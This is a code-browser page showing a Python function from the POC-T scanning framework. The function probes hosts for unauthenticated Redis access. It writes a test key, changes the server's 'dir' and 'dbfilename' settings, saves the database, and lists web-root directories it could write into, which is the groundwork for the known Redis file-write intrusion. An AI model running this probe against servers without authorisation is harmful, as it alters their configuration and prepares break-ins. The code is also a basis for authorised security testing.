MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/redis-web-probe.py:21–68  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

19
20
21def poc(url):
22 url = host2IP(url)
23 ip = url.split(':')[0]
24 port = int(url.split(':')[-1]) if ':' in url else 6379
25
26 for web_port in [80, 443, 8080, 8443]: # 判断web服务
27 if checkPortTcp(ip, web_port):
28 try:
29 real_url = redirectURL(ip + ':' + str(web_port))
30 except Exception:
31 real_url = ip + ':' + str(web_port)
32 break # TODO 这里简单化处理,只返回了一个端口的结果
33 else:
34 return False
35
36 try:
37 r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
38 if 'redis_version' not in r.info(): # 判断未授权访问
39 return False
40 key = randomString(5)
41 value = randomString(5)
42 r.set(key, value) # 判断可写
43 r.config_set('dir', '/root/') # 判断对/var/www的写入权限(目前先判断为root)
44 r.config_set('dbfilename', 'dump.rdb') # 判断操作权限
45 r.delete(key)
46 r.save() # 判断可导出
47 except Exception, e:
48 return False
49
50 # 枚举绝对路径
51 path_list = []
52 for each in ABSPATH_PREFIXES.LINUX:
53 try:
54 r.config_set('dir', each.rstrip('/'))
55 path_list.append(each)
56 for suffix in ABSPATH_SUFFIXES:
57 try:
58 r.config_set('dir', suffix.rstrip('/'))
59 path_list.append(each.rstrip('/') + '/' + suffix)
60 except Exception:
61 continue
62 except Exception:
63 continue
64
65 if len(path_list):
66 return real_url + ' ' + ' '.join(path_list)
67 else:
68 return False

Callers

nothing calls this directly

Calls 9

host2IPFunction · 0.90
checkPortTcpFunction · 0.90
redirectURLFunction · 0.90
randomStringFunction · 0.90
splitMethod · 0.80
infoMethod · 0.80
setMethod · 0.80
deleteMethod · 0.80
appendMethod · 0.45

Tested by

no test coverage detected